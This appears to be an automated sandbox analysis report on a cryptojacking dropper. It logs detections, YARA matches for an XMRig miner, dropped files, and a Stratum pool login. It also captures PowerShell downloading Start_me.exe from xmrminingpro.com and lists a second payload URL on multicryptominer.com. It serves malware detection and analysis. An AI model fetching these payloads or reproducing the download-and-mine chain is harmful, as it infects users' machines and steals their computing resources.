Analysis Report

Source: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Silent.exe	Avira: Label: TR/ATRAPS.Gen
Source: C:\ProgramData\qswGutmnEr\Silent.exe	Avira: Label: TR/ATRAPS.Gen
Source: C:\ProgramData\playersclub\xmr-stak.exe	Avira: Label: HEUR/AGEN.1001820
Source: C:\ProgramData\playersclub\player.exe	Avira: Label: TR/BitCoinMiner.wmhoy

Antivirus detection for submitted file

Source: iaejSdZgD3.exe

Avira: Label: TR/AD.Bosoda.rdoap

Multi AV Scanner detection for submitted file

Source: iaejSdZgD3.exe

virustotal: Detection: 67%

Perma Link

Antivirus detection for unpacked file

Source: 9.1.Silent.exe.ed0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 10.0.notepad.exe.400000.3.unpack	Avira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.2.unpack	Avira: Label: PUA/CoinMiner.Gen
Source: 9.0.Silent.exe.ed0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 10.0.notepad.exe.400000.0.unpack	Avira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.4.unpack	Avira: Label: PUA/CoinMiner.Gen
Source: 10.0.notepad.exe.400000.1.unpack	Avira: Label: PUA/CoinMiner.Gen

Yara signature match

Source: 0000000B.00000001.14326263986.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14323320959.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322375198.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14324102262.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14323677907.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14321426582.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14324578745.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000002.14569189793.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322706721.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000000.14322028185.00000000004CE000.00000002.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp, type: MEMORY	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases
Source: dropped/player.txt, type: DROPPED	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: C:\ProgramData\playersclub\player.txt, type: DROPPED	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.txt, type: DROPPED	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address
Source: 10.0.notepad.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases

Bitcoin Miner:

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.1.20:49166 -> 104.207.130.172:10064 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4brl51jcc9ngq71kwhnyodrffsdzy7m1huu7mru4numxahnfbejhktzv9hdal4gfunbxlpc3bemklgapbf5vwtanqrzvo2dv3ebjhc95xg","pass":"silent:x","agent":"xmrig/2.6.2 (windows nt 6.1; win64; x64) libuv/1.20.2 gcc/7.3.0","algo":["cn/1","cn/0","cn/xtl","cn"]}}.

Found strings related to Crypto-Mining

Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp	String found in binary or memory: stratum+tcp://
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp	String found in binary or memory: _Z27cryptonight_extra_gpu_finaliyPjS_S__<
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp	String found in binary or memory: stratum+tcp://
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\sppsvc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_0000000140004D08 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,wcscat,FindFirstFileW,GetLastError,HeapFree,	0_2_0000000140004D08
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_000000014000B758 FindFirstFileW,	0_2_000000014000B758
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7B1A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_1_000000013FE7B1A8
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9C630 FindFirstFileExA,	5_1_000000013FE9C630
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE8E830 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,FindClose,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,	5_1_000000013FE8E830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00475350 FindFirstFileW,FindClose,GetFileAttributesW,	6_2_00475350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004753E0 _wcschr,_wcschr,_wcschr,_wcsncpy,_wcschr,FindClose,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,	6_2_004753E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00454140 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,	6_2_00454140
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00443150 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__alldiv,	6_2_00443150
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00442290 _wcsncpy,_wcsrchr,_wcsrchr,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00453350 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,	6_2_00453350
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004424A7 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_004424A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004424A9 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,__itow,	6_2_004424A9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004548C0 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_004548C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004429C0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,	6_2_004429C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00442B40 _wcsncpy,SystemTimeToFileTime,GetLastError,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_wcsrchr,_wcsrchr,FindFirstFileW,GetLastError,SetFileTime,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	6_2_00442B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0042BC70 _wcsncpy,_wcsrchr,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_0042BC70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00470CF0 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,	6_2_00470CF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00441D00 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,_wcsrchr,GetLastError,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,	6_2_00441D00
Source: C:\ProgramData\playersclub\LaunchServ.exe	Code function: 12_2_00401A50 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_00401A50

Networking:

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.1.20:49166 -> 104.207.130.172:10064

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 17 Aug 2018 10:41:11 GMTServer: ApacheLast-Modified: Tue, 17 Jul 2018 13:17:56 GMTETag: "83d672-57131c632e9e7"Content-Length: 8640114Content-Type: application/x-msdos-programX-Varnish: 356257129Age: 0Via: 1.1 varnish (Varnish/6.0)Accept-Ranges: bytesConnection: keep-aliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 af 3d 7e 4d ce 53 2d 4d ce 53 2d 4d ce 53 2d f9 52 a2 2d 45 ce 53 2d f9 52 a0 2d c7 ce 53 2d f9 52 a1 2d 40 ce 53 2d 76 90 50 2c 45 ce 53 2d 76 90 57 2c 5e ce 53 2d 76 90 56 2c 66 ce 53 2d 44 b6 d0 2d 44 ce 53 2d 44 b6 d4 2d 4c ce 53 2d 44 b6 c0 2d 4e ce 53 2d 4d ce 52 2d b2 ce 53 2d da 90 56 2c 7d ce 53

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /Start_me.exe HTTP/1.1Host: xmrminingpro.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-CHOOPA-ChoopaLLCUS AS-CHOOPA-ChoopaLLCUS
Source: Joe Sandbox View	ASN Name: ONECOMDK ONECOMDK

Contains functionality to download additional files from the internet

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Code function: 9_1_00ED45C0 GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

9_1_00ED45C0

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /Start_me.exe HTTP/1.1Host: xmrminingpro.comConnection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: xmrminingpro.com

Urls found in memory or binary data

Source: powershell.exe, 00000004.00000002.14283693344.0000000002840000.00000004.sdmp	String found in binary or memory: file://
Source: Silent.exe, Silent.exe, 00000009.00000000.14306328199.0000000000ED8000.00000002.sdmp	String found in binary or memory: file:///
Source: installer.exe, 0000000B.00000003.14417872180.0000000000A82000.00000004.sdmp	String found in binary or memory: file:///C:/ProgramData/playersclub/LaunchServ.exe
Source: installer.exe, 0000000B.00000003.14417872180.0000000000A82000.00000004.sdmp	String found in binary or memory: file:///C:/ProgramData/playersclub/LaunchServ.exefb
Source: setup.exe, 00000006.00000002.14329550761.0000000000B48000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Temp/RarSFX0/installer.exe
Source: powershell.exe, 00000004.00000002.14281932152.000000000016E000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/&
Source: powershell.exe, 00000004.00000002.14281932152.000000000016E000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0//
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: iaejSdZgD3.exe, 00000000.00000002.14290926038.00000000003A4000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/system32/cmd.exe
Source: powershell.exe, 00000004.00000002.14283693344.0000000002840000.00000004.sdmp	String found in binary or memory: file:///P
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://
Source: setup.exe, 00000006.00000003.14316647836.0000000003A01000.00000004.sdmp	String found in binary or memory: http://%s/h
Source: setup.exe, 00000006.00000003.14316647836.0000000003A01000.00000004.sdmp	String found in binary or memory: http://%s/hLocationHTTP
Source: setup.exe, setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.dr	String found in binary or memory: http://ahkscript.org
Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.dr	String found in binary or memory: http://ahkscript.orgCould
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.co
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.com/
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.com/B
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.com/help
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.com/helphttp://java.com/helpB
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://java.com/http://java.com/B
Source: powershell.exe, 00000004.00000003.14259219372.000000000017A000.00000004.sdmp	String found in binary or memory: http://javl
Source: systemSpawn.exe, 0000000F.00000000.14334773706.00000000004CE000.00000002.sdmp, systemSpawn.exe.6.dr	String found in binary or memory: http://multicryptominer.com/player.exe
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilterP
Source: powershell.exe, 00000004.00000002.14285151440.000000000309C000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: pthreadVC2.dll.6.dr	String found in binary or memory: http://sourceware.org/pthreads-win32/D
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmp	String found in binary or memory: http://www.openssl.org/V
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: setup.exe, 00000006.00000003.14306899705.0000000002560000.00000004.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html.
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp, setup.exe, 00000006.00000003.14316745476.0000000000B7E000.00000004.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://xmrmining
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://xmrminingpro.com
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://xmrminingpro.com/Start_me
Source: powershell.exe, 00000004.00000002.14281907269.0000000000130000.00000004.sdmp, powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://xmrminingpro.com/Start_me.exe
Source: powershell.exe, 00000004.00000002.14283747289.000000000289E000.00000004.sdmp	String found in binary or memory: http://xmrminingpro.com/Start_me.exePE
Source: powershell.exe, 00000004.00000002.14284302075.0000000002C86000.00000004.sdmp	String found in binary or memory: http://xmrminingpro.comH
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp	String found in binary or memory: https://H
Source: notepad.exe, 0000000A.00000000.14327903687.0000000000400000.00000040.sdmp	String found in binary or memory: https://L
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp	String found in binary or memory: https://www.khronos.org/registry/OpenCL/extensions/amd/cl_amd_media_ops.txt
Source: Win.exe, 00000005.00000003.14297848634.0000000002CA0000.00000004.sdmp	String found in binary or memory: https://www.khronos.org/registry/OpenCL/extensions/amd/cl_amd_media_ops2.txt

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_004045E0 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,

6_2_004045E0

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_004044E0 GetClipboardFormatNameW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData,

6_2_004044E0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_00438890 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,

6_2_00438890

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_0040F060 GetAsyncKeyState,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

6_2_0040F060

System Summary:

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\playersclub\Process.exe 5AAF73EF89F0EFAB963ABB170BC9B7CD7D4D5BD7A691CD83137B4CC39CD120DE
Source: Joe Sandbox View	Dropped File: C:\ProgramData\playersclub\libcurl-4.dll 7719DDD67FF07BEB26BC31D1CF925F278E302E6163E02169FF7DCEFCB651E007
Source: Joe Sandbox View	Dropped File: C:\ProgramData\playersclub\libiconv-2.dll CF33FC7FDF9DE404736A23B6821FD596AA53492A51DD4D83958C0DE477947708
Source: Joe Sandbox View	Dropped File: C:\ProgramData\playersclub\libidn-11.dll 6E4D69C688B9F318BB497CD7A322DF2E5470529880420B783061FA87AA916570
Source: Joe Sandbox View	Dropped File: C:\ProgramData\playersclub\libintl-8.dll 34618F63FD89C387019F7C061846D318FA98B52C7D9025DE093D442F29D4E87B

Powershell connects to network

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 46.30.215.96 80

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\Win.exe

Jump to dropped file

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Window found: window name: AutoHotkey			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Window found: window name: AutoHotkey

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Memory allocated: 77580000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Memory allocated: 776A0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Memory allocated: 77580000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Memory allocated: 776A0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Memory allocated: 77580000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Memory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 776A0000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 77580000 page execute and read and write
Source: C:\ProgramData\playersclub\LaunchServ.exe	Memory allocated: 776A0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	Memory allocated: 77580000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	Memory allocated: 776A0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_000000014000B810 NtdllDefWindowProc_W,	0_2_000000014000B810
